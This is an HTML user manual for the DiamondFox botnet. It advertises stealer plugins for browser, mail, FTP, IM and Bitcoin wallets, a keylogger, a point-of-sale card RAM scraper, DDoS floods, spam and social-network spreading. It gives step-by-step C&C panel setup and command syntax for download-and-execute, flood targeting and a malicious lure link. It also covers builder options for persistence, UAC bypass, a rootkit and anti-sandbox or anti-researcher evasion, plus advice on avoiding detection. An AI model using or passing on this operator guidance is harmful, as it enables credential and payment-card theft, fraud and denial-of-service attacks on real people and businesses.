<!DOCTYPE html>
<html class="not-ie" lang="en">

<head>
<title>User Manual</title>
<link rel="stylesheet" media="screen" href="css/bootstrap.css"/>
<link rel="stylesheet" media="screen" href="css/styles.css"/>
<link rel="stylesheet" href="http://fonts.googleapis.com/css?family=PT+Sans:400,700,400italic,700italic">
<link rel="stylesheet" href="css/bg_default.css" />

</head>

<body data-spy="scroll" data-offset="61" data-target=".nav-collapse">
<div class="container">
	<div class="row">
		<div class="span3 sidebar">
			<nav id="nav">
				<div class="logo">
					<br>
					<font size="5" align="center"><b>/*DiamondFox*/</b></font>
                    <br>					
				</div>
				<div class="nav-collapse">
						<ul class="nav">
						    <br>
						    <li><a href="#tfb"><i><span>Intro</span></i></a></li>
							<li><a href="#installation"><i><span>Installation</span></i></a></li>
							<li><a href="#webpanel"><i><span>Panel</span></i></a></li>
							<li><a href="#builder"><i><span>Builder</span></i></a></li>
							<li><a href="#security"><i><span>Security</span></i></a></li>
						</ul>
				</div>		
			</nav>		
		</div>

		<div class="span9 content offset3">
			<section id="tfb" class="section mtcon">
				<div class="row">
					<div class="span8 short-dec">
					    <center><img src="img/appbanner.png"/></center>
						<hr>
						<p>DiamondFox is a HTTP Plugin-Based botnet made for stability and functionality,
						 for establish a stable connection with a considerable amount of bots and will be under constant development.<br>
						 This botnet doesn't have any function because its based in plugins, that means a stable connection
                         and alot of future functions.<br>
						 This Build contain the following plugins:
						 <br><br>
                         <li><b>Browsers Password Stealer:</b><br><br></li>						
  						 <pre>	*Internet Explorer (Version 4.0 - 11.0)</pre>
						 <pre>	*Mozilla Firefox (All Versions)</pre>
						 <pre>	*Google Chrome (All Versions)</pre>
						 <pre>	*Safari (All versions)</pre>
						 <pre>	*Opera (All versions)</pre><br><br>
						 <li><b>FTP Password Stealer:</b><br><br></li>
						 <pre>	*Filezilla</pre>
						 <pre>	<b>*April 2015:</b> Updated for decrypt the Passwords.</pre><br><br>
						 <li><b>Distributed Denedial of Service:</b><br><br></li>
						 <pre>	*UDP Flood in random ports</pre>
						 <pre>	*HTTP Flood</pre><br><br>
						 <li><b>Keylogger:</b><br><br></li>
						 <pre>	*Advanced Keyboard Hook</pre>
						 <pre>	*Makes a easy readable html log</pre><br><br>
						 <li><b>E-Mail Grabber:</b><br><br></li>
						 <pre>	*Outlook Express</pre>
						 <pre>	*Microsoft Outlook 2000 (POP3 and SMTP Accounts only)</pre>
						 <pre>	*Microsoft Outlook 2002 to 2013 (POP3, IMAP, HTTP and SMTP Accounts)</pre>
						 <pre>	*Windows Mail</pre>
						 <pre>	*Windows Live Mail</pre>
						 <pre>	*IncrediMail</pre>
						 <pre>	*Eudora</pre>
						 <pre>	*Netscape 6.x/7.x</pre>
						 <pre>	*Mozilla Thunderbird</pre>
						 <pre>	*Group Mail Free</pre>
						 <pre>	*Yahoo! Mail</pre>
						 <pre>	*Hotmail/MSN mail</pre>
						 <pre>	*Gmail</pre><br><br>
						 <li><b>Point-Of-Sales Grabber (RAM Scraper)</b><br><br></li>
						 <pre>	*Grab track2 from the Random Access Memory.</pre>
						 <pre>	*Not working with verifon machines.</pre><br><br>
						 <li><b>Instant messaging grabber:</b><br><br></li>
						 <pre>	*Yahoo Messenger (Versions 5.x and 6.x).</pre>
						 <pre>	*Google Talk.</pre>
						 <pre>	*ICQ Lite 4.x/5.x/2003.</pre>
						 <pre>	*AOL Instant Messenger.</pre>
						 <pre>	*Trillian.</pre>
						 <pre>	*Trillian Astra.</pre>
						 <pre>	*Miranda.</pre>
						 <pre>	*GAIM/Pidgin.</pre>
						 <pre>	*PaltalkScene.</pre>
						 <pre>	*Digsby.</pre><br><br>
						 <li><b>Screenshot:</b><br><br></li>
						 <pre>	*Take a Remote screenshot.</pre><br><br>
						 <li><b>SPAM:</b><br><br></li>
						 <pre>	*Inbox Messages</pre>
						 <pre>	*Custom SMTP</pre>
						 <pre>	*Allow html letters</pre>
						 <br><br>
						 <li><b>DNS Redirects:</b><br><br></li>
						 <pre>	*Remote host file editor for DNS redirections.</pre>
						 <pre>	*Needs admin rights.</pre>
						 <br><br>
						 <li><b>Bitcoin Wallet Stealer:</b><br><br></li>
						 <pre>	*Bitcoin core.</pre>
						 <pre>	*Bitcoin-qt.</pre>
						 <pre>	*MultiBit.</pre>
						 <pre>	*Armory.</pre>
						 <br><br>
						 <li><b>Browser Homepage Changer:</b><br><br></li>
						 <pre>	*Firefox.</pre>
						 <br><br>
						 <li><b>Social Networks Message Spreader:</b><br><br></li>
						 <pre>	*Facebook.</pre>
						 <pre>	*Twitter.</pre>
						 <br><br>
						 
						 I give support and free updates and I'll developing more plugins for this botnet so if you have some ideas let me know. 
						<br><br>
						<hr>
						<h2 class="mtcon-title">Changelog</h2>
						<br><br>
						<li><b>Built-4.2.0.302</b><br></li>
						<pre>	[+] Fixed Task viewer viariable issue </pre>
						<pre>	[+] Fixed dangerous upload vulnerability on C&C </pre>
						<pre>	[+] Fixed Logout issue on the C&C </pre>
						<pre>	[+] Fixed Keylogger and update function issue </pre>
						<pre>	[+] Added installation options on the bot builder</pre>
						<pre>	[+] Added ramdom logo on the C&C login</pre>
						<pre>	[+] Added HKCU startup method</pre>
						<pre>	[+] Added Winlogon Startup Method</pre>
						<pre>	[+] Added custom install name</pre>
						<pre>	[+] Added %TEMP% installation dir</pre>
						<pre>	[+] Added %WINDIR% installation dir</pre>
						<pre>	[+] Added %PROGRAMFILES% installation dir</pre>
						<pre>	[+] Added optional melt function</pre>
						<pre>	[+] Added startup persistance option</pre>
						<pre>	[+] Added automatic keylogger installation option</pre>
						<pre>	[+] Added automatic PoS grabber installation option</pre>
						<pre>	[+] Added automatic grabbers option</pre>
						<pre>	[+] Added harder anti-crack methods on the bot builder</pre>
						<pre>	[-] Removed feedback tab</pre>
						<br><br>
						<li><b>Built-4.2.0.257</b><br></li>
						<pre>	[+] Improved screenshot viewer</pre>
						<pre>	[+] Better identification of lite bots in the webpanel</pre>
						<pre>	[+] Improved memory storage</pre>
						<pre>	[+] Improved Task status viewer</pre>
						<pre>	[+] Updated keylogger module</pre>
						<pre>	[+] All Bugs on Windows 8 Fixed</pre>
						<pre>	[+] Improved melt routine</pre>
						<pre>	[+] Improved install routine</pre>
						<pre>	[+] Improved bot size</pre>
						<pre>	[-] Removed RAR Spread</pre>
						<pre>	[+] Added File Extention Selector</pre>
						<pre>	[+] Source Code optimization</pre>
						<pre>	[+] Added Firefox Homepage Changer Plugin</pre>
						<pre>	[+] Added Facebook/Twitter message spreader Plugin</pre>
						<pre>	[+] Improved load time</pre>
						<pre>	[+] Added SysClean (Bot Remover)</pre>
						<pre>	[-] Fixed RES Core data bug</pre>
						<pre>	[-] Fixed x64 RAM plugin charge.</pre>
						<pre>	[-] Clipboard Bug corrected on Windows 8</pre>
						<pre>	[+] Added New shellcode to the runpe.</pre>
						<br><br>
						<li><b>Built-4.2.0.216</b><br></li>
						<pre>	[+] Added bitcoin wallet stealer.</pre>
						<pre>	[+] Added two methods for store the data inside the bot.</pre>
						<pre>	[+] added lite builder tab.</pre>
						<pre>	[+] added feedback tab.</pre>
						<pre>	[+] Added automatic grabber routine.</pre>
						<pre>	[+] Added trick for UAC execution.</pre>
						<pre>	[+] Added Lite Ring3 Rootkit using Admin rights. (Hide key in registry [All OS Versions])</pre>
						<pre>	[+] Added an updated FTP stealer plugin.</pre>
						<pre>	[+] Added an updated keylogger plugin.</pre>
						<pre>	[+] Added Instant messaging stealer plugin instead RDP stealer.</pre>
						<pre>	[+] Added anti-researcher function.</pre>
						<pre>	[+] Added task status viewer in the web panel.</pre>
						<pre>	[+] Added lite bot support in the web panel.</pre>
						<pre>	[+] Added compatibility between lite bot and full bot.</pre>
						<pre>	[+] Added automatic clipboard for User-Agent.</pre>
						<pre>	[+] Added automatic Xor password Generator.</pre>
						<pre>	[+] Added Plugin detection on the webpanel.</pre>
						<pre>	[+] Added new icon in builder.</pre>
						<pre>	[+] Added new logo in web panel.</pre>
						<pre>	[+] Improved Memory use.</pre>
						<pre>	[+] Improved UAC disambler.</pre>
						<pre>	[+] Improved install routine.</pre>
						<pre>	[+] Improved Uninstall routine.</pre>
						<pre>	[-] Multiple mini bugs corrected.</pre>
						<br><br>
						<li><b>Built-3.1.0.4</b><br></li>
						<pre>	[+] Gorynych Project</pre>
						<br><br>
						<li><b>Built-2.3.0.42</b><br></li>
						<pre>	[+] Pharmacy Project</pre>
						<br><br>
						<li><b>Built-1.5.0.11</b><br></li>
						<pre>	[+] #PHARMING Project</pre>
						</p>
						<hr>
					</div>
				</div>
			</section>

			<section id="installation" class="section mtcon">
				<div class="row">
					<h2 class="mtcon-title">Installation</h2>
					<div class="span8 short-dec">
						<li><p><b>Open the CPanel and find "MYSQL Databases"</b></li>
						<br><br>
						<center><img src="img/1/1.jpg"/></center>
						<br><br>
						<li><b>Create a new database</b></li>
						<br><br>
						<center><img src="img/1/2.jpg"/></center>
						<br><br>
						<li><b>Create a new user</b></li>
						<br><br>
						<center><img src="img/1/3.jpg"/></center>		
						<br><br>
						<li><b>Add the user to the database</b></li> 
						<br><br>
						<center><img src="img/1/4.jpg"/></center>
						<br><br>
						<li><b>Give all the privileges to the user</b></li>
						<br><br>
						<center><img src="img/1/5.jpg"/></center>
						<br><br>
						<li><b>On the cpanel find "file manager"</b></li>
						<br><br>
						<center><img src="img/1/6.jpg"/></center>
						<br><br>
						<li><b>Upload the and decompress "panel.zip"</b></li>
						<br><br>
						<center><img src="img/1/7.jpg"/></center>
						<br><br>
						<center><img src="img/1/8.jpg"/></center>
						<br><br>
						<li><b>Open the URL where you extract the panel and you will see the installer form</b></li>
						<br><br>						
						<center><img src="img/1/9.jpg"/></center>
						<br><br>
						<li><b>Open the bot builder and fill it, "Panel:" is the URL where you extract the web panel</b></li>
						<br><br>
						<center><img src="img/2/1.jpg"/></center>
						<br><br>
						<li><b>This options are really important, don't forget it.</b></li>
						<br><br>
						<center><img src="img/2/2.jpg"/></center>
						<br><br>
						<li><b>Install options, fill it like you want.</b></li>
						<br><br>
						<center><img src="img/3/3.png"/></center>
						<br><br>
						<li><b>Misc options, fill it like you want.</b></li>
						<br><br>
						<center><img src="img/2/3.jpg"/></center>
						<br><br>
						<li><b>Build the bot and I suggest save the configurations.</b></li>
						<br><br>
						<center><img src="img/2/4.jpg"/></center>
						<br><br>
						<li><b>Return to the installation form and we fill it then press "Install".<br><br></b></li>
						<pre>	<b>*Panel User:</b> User for the web panel login</pre>
						<pre>	<b>*Panel Password:</b> Password for the web panel login</pre>
						<pre>	<b>*User-Agent:</b> The same number of "User-Agent" from the builder</pre>
						<pre>	<b>*Connection Key:</b> The same number of "Connection Key" from the builder</pre>
						<pre>	<b>*MYSQL Server:</b> Place where is located the Database (usually localhost)</pre>
						<pre>	<b>*MYSQL User:</b> The MYSQL user</pre>
						<pre>	<b>*MYSQL Password:</b>  The password for MYSQL user</pre>
						<pre>	<b>*MYSQL Database:</b> The name of the database</pre>
						<br><br>
						<center><img src="img/2/5.jpg"/></center>
						<br><br>
						<li><b>If you did all correct you will be redirected to the login.</b></li>
						<br><br>
						<center><img src="img/2/6.jpg"/></center>
						</p>
					</div>
				</div>
            </section>				
			
			<section id="webpanel" class="section mtcon">
				<div class="row">
					<h2 class="mtcon-title">Panel</h2>
					<div class="span8 short-dec">
						<p>The Panel its the first part of the botnet, here the bot send and store data. The panel is protected against SQL injections and XSS
						   attacks.<br>
						   If you share the web panel I will not give you more free security updates or new functions.
                           <br><br>
                           <li><b>Home:</b> Show the total bots, online bots and the total logs</li>
						   <br><br>
                           <pre><center><img src="img/5/1.jpg"/></center></pre>
						   <br><br>
						   <li><b>Clients:</b> Show the all bots, their ID, Country, IP, PC Name, OS, Status and a full profile information.</li>
						   <br><br>
						   <pre><center><img src="img/5/2.jpg"/></center>
						   <center><img src="img/5/6.jpg"/></center></pre>
						   <br><br>
						   <li><b>Tasks:</b> Show all the bots available commands and plugins status for each bot.</li>
						   <br><br>
						   <center><img src="img/5/3.jpg"/></center></pre>
						   <br><br>
                           <pre>	*You can send individual commands</pre>
						   <pre>	*You can select for country, status or all bots</pre>
						   <br><br>
						   <li><b>Commands:</b></li>
						   <br><br>
						   <pre>	<b>*Download & Execute (Memory):</b> Download and execute a file with a RUNPE</pre>
						   <pre>	<b>*Download & Execute (Disk):</b> Download and execute in Hard drive</pre>
						   <pre>	<b>*Open website [Visible]:</b> Open a website in the default browser</pre>
						   <pre>	<b>*Open website [Hidden]:</b> Open a website Hidden using iexplorer</pre>
						   <pre>	<b>*UDP Flood:</b> UDP flood in a random port</pre>
						   <pre>	<b>*HTTP Flood:</b> HTTP Flood</pre>
						   <pre>	<b>*Activate / Deactivate Host:</b> Start or stop the host file editor</pre>
						   <pre>	<b>*FB/Twitter Spread:</b> Spread a text message through that Networks</pre>
						   <pre>	<b>*Homepage Chager:</b> Change the firefox homepage</pre>
						   <pre>	<b>*Activate / Deactivate PoS:</b> Start or stop the PoS grabber</pre>
						   <pre>	<b>*Activate Span Sender:</b> Start the spam sender in a bot<br>	*note: just select one bot for spam, this plugin its beta.</pre>
						   <pre>	<b>*Bitcoin Wallet Stealer:</b> Steal all the bitcoin wallets in the remote machine </pre>
						   <pre>	<b>*Start / Stop Keylogger:</b> start or stop the remote keylogger</pre>
						   <pre>	<b>*Take Screenshot:</b> Take a remote screenshot.</pre>
						   <pre>	<b>*Grab Passwords:</b> grab all stored passwords</pre>
						   <pre>	<b>*Grab FTP:</b> grab all filezilla logins</pre>
						   <pre>	<b>*Grab RDP:</b> grab all stored RDP</pre>
						   <pre>	<b>*Grab MAIL:</b> grab all mail stored data</pre>
						   <pre>	<b>*Update:</b> Update a bot from URL</pre>
						   <pre>	<b>*Uninstall:</b> Uninstall</pre>
						   <br><br>
						   <li><b>Commands Examples:</b></li><br>					   
						   <br><br>
						   <pre><b>Download & Execute (Memory)</b> http://www.site.com/file.exe</pre>
						   <pre><b>Download & Execute (Disk)</b> http://www.site.com/file.exe</pre>
						   <pre><b>Open Website [Visible]</b> http://www.site.com/</pre>
						   <pre><b>Open Website [Hidden]</b> http://www.site.com/</pre>
						   <pre><b>Homepage Changer</b> http://www.newhomesite.com</pre>
						   <pre><b>FB/Twitter Spread</b> Hey check this out: http://www.site.com/file.exe</pre>
						   <pre><b>UDP Flood</b> IP@TIME. *The time in seconds. EXAMPLE: 192.168.131.23@60</pre>
						   <pre><b>HTTP Flood</b> IP@HOST@SOCKS@TIME. *The time in seconds. EXAMPLE: 192.168.131.23@http://www.site.com/@1000@60</pre>
						   <pre><b>Update</b> http://www.site.com/file.exe</pre>
						   <br><br>
						   <li><b>Statistics</b></li>
						   <br><br>
						   <pre><center><img src="img/5/4.jpg"/></center><br><center><img src="img/5/5.jpg"/></center></pre>
						   <br><br>
						   <li><b>Reports</b></li>
						   <br><br>
						   <pre><center><img src="img/5/7.jpg"/></center></pre>
						   <pre><img src="img/5/1/1.jpg"/> <b>Passwords</b></pre>
						   <pre><img src="img/5/1/2.jpg"/> <b>Keylogs</b></pre>
						   <pre><img src="img/5/1/3.jpg"/> <b>PoS Data</b></pre>
						   <pre><img src="img/5/1/4.jpg"/> <b>Mails</b></pre>
						   <pre><img src="img/5/1/5.jpg"/> <b>RDP</b></pre>
						   <pre><img src="img/5/1/6.jpg"/> <b>FTP</b></pre>
						   <pre><img src="img/5/1/7.jpg"/> <b>Screenshots</b></pre>
						   <br><br>
						   <li><b>Bottom Menu:</b></li>
						   <br><br>
						   <pre><center><img src="img/5/8.jpg"/></center></pre>
						   <pre><img src="img/5/2/1.jpg"/> <b>DNS Redirects</b></pre>
						   <pre><center><img src="img/5/2/6.jpg"/></center></pre>
						   <pre><img src="img/5/2/2.jpg"/> <b>Spam Configurations</b></pre>
						   <pre><center><img src="img/5/2/7.jpg"/></center><br><b>Email:</b> Email Address<br><b>Password:</b> Email Password<br><b>smtp:</b> Email smtp address<br><b>Subject:</b> Message Subject<br><b>Message:</b> Message in HTML Format.<br><b>Email List:</b> Email List (one line per email)</pre>
						   <pre><img src="img/5/2/3.jpg"/> <b>Download All Reports</b></pre>
						   <pre><center><img src="img/5/2/8.jpg"/></center></pre>
						   <pre><img src="img/5/2/4.jpg"/> <b>Clean Dead Bots</b></pre>
						   <pre><img src="img/5/2/5.jpg"/> <b>Logout</b></pre>
					   </p>
					</div>	
				</div>
			</section>		
					
					
			<section id="builder" class="section mtcon">
				<div class="row">
					<h2 class="mtcon-title">Builder</h2>
					<div class="span8 short-dec">
						<p>The Builder its the second part of the botnet, this is protected with VMP and HWID so you only can use it in one computer, if you share your
							Builder, plugins, or a uncrypted binary you will not get free updates and support so don't be stupid.
							<br><br>
							<li><b>Connection tab</b></li>
							<br><br>
							<center><img src="img/3/1.png"/></center>
							<br><br>
							<pre><b>	*Panel:</b> its the main connection.</pre>
							<pre><b>	*Fallback Panel:</b> If the main panel isn't available this is the alternative connection.</pre>
							<pre><b>	*Time:</b> Time between each connection with the panel.</pre>
							<br><br>
							<li><b>Security tab</b></li>
							<br><br>
							<center><img src="img/3/2.png"/></center>
							<br><br>
							<pre><b>	*Connection Key:</b> Key used for the encryption of the send data.</pre>
							<pre><b>	*XOR Key:</b> Key used for the encryption of the data inside the bot.</pre>
							<pre><b>	*User-Agent:</b> Secret user-agent, this is used for only get connections of bots in the panel.</pre>
							<br><br>
							<li><b>Installation tab</b></li>
							<br><br>
							<center><img src="img/3/3.png"/></center>
							<br><br>
							<pre><b>	*Install Name:</b> Name used for the installed bot.</pre>
							<pre><b>	*Install Path:</b> Directory where the bot will be installed.</pre>
							<pre><b>	*Startup:</b> Startup method used for the bot.</pre>
							<pre><b>	*Melt after execution:</b> The bot will self-destroy after execution.</pre>
							<pre><b>	*Startup Persistance:</b> The bot will watch all startup methods for keep it active.</pre>
							<pre><b>	*Install Keylogger:</b> The bot will auto install the keylogger plugin.</pre>
							<pre><b>	*Install PoS Grabber:</b> The bot will auto install the Point-Of-Sales grabber plugin.</pre>
							<pre><b>	*Automatic Grabbers:</b> The bot will auto grab all passwords every startup.</pre>
							<br><br>
							<li><b>Extras tab</b></li>
							<br><br>
							<center><img src="img/3/4.png"/></center>
							<br><br>
							<pre><b>	*Anti-Sysanalizer:</b> Protect the bot against Sysanalizer.</pre>
							<pre><b>	*Anti-VirtualBox:</b> Protect the bot against VirtualBox Emulation.</pre>
							<pre><b>	*Anti-VMWare:</b> Protect the bot against VMWare Emulation.</pre>
							<pre><b>	*Anti-Anubis:</b> Protect the bot against Anubis Online Analizer.</pre>
							<pre><b>	*Anti-OllyDBG:</b> Protect the bot against be analized with OllyDBG.</pre>
							<pre><b>	*Anti-Sandboxie:</b> Protect the bot against be executed in Sandboxie.</pre>
							<pre><b>	*Anti-Malwr.com:</b> Protect the bot against Malwr.com Online Analizer.</pre>
							<pre><b>	*Anti-Wine:</b> Protect the bot against linux emulation.</pre>
							<pre><b>	*Anti-Norman:</b> Protect the bot against Norman Sandbox.</pre>
							<pre><b>	*Anti-Researchers:</b> Protect the bot against some researchers machines.</pre>
							<pre><b>	*Disable Regedit:</b> Disable The registry editor.</pre>
							<pre><b>	*Disable Taskmanager:</b> Disable the windows Taskmanager.</pre>
							<pre><b>	*USB Spread:</b> Spread through USB flash drives with *.ink files.</pre>
							<pre><b>	*Dropbox Spread:</b> Spread through Dropbox file share.</pre>
							<pre><b>	*User Account Control Forcer:</b> For the bot be executed as an admin.</pre>
							<pre><b>	*Extention Changer:</b> You can choose the extention that you want for your built bot.</pre>
							<br><br>
							<li><b>Build tab</b></li>
							<br><br>
							<center><img src="img/3/5.png"/></center>
							<br><br>
							<pre><b>	*Build:</b> Build the bot.</pre>
							<pre><b>	*Load Configs:</b> Load a configuration file.</pre>
							<pre><b>	*Save Configs:</b> Create a configuration file.</pre>
							<pre><b>	*RES:</b> Save the data inside the bot as a resource.</pre>
							<pre><b>	*EOF:</b> Save the data inside the bot as EOF.</pre>
							<br><br>
							<li><b>Lite Builder Tab</b></li>
							<br><br>
							<center><img src="img/3/6.png"/></center>
							<br><br>
							<pre>	    *Smaller Bot.</pre>
							<pre>	    *Less Functions.</pre>
							<pre>	    *Proactive Bypass.</pre>
							<pre>	    *Easier to undetect.</pre>
							<pre>	    *Works like a USB Worm.</pre>
							<pre>	    *Codded in Visual Basic Script.</pre>
						</p>
					</div>
                </div>
            </section>				
					
			<section id="security" class="section mtcon">
				<div class="row">
					<h2 class="mtcon-title">Security</h2>
					<div class="span8 short-dec">
						<p><b>This is just a few advices:</b>
						<br><br>
						<li><b>Never share a uncrypted bot</b></li>
						<li><b>Never use virustotal for analyze files</b></li>
						<li><b>Use a strong password for the web panel login</b></li>
						<li><b>After download the logs, please delete the "reports.zip" from the panel</b></li> 
						<li><b>Protect the web panel path in the Cpanel:</b></li>
						<br><br>
						<pre><center><img src="img/4/1.jpg"/></center></pre>
						<pre>Select the folder where is installed the web panel
						<br>
						<center><img src="img/4/2.jpg"/></center></pre>
						<pre><center><img src="img/4/3.jpg"/></center></pre>
						<br><br>						
						</p>
					</div>
				</div>	
			</section>	
		</div>
	</div>
</div>
</body>
</html>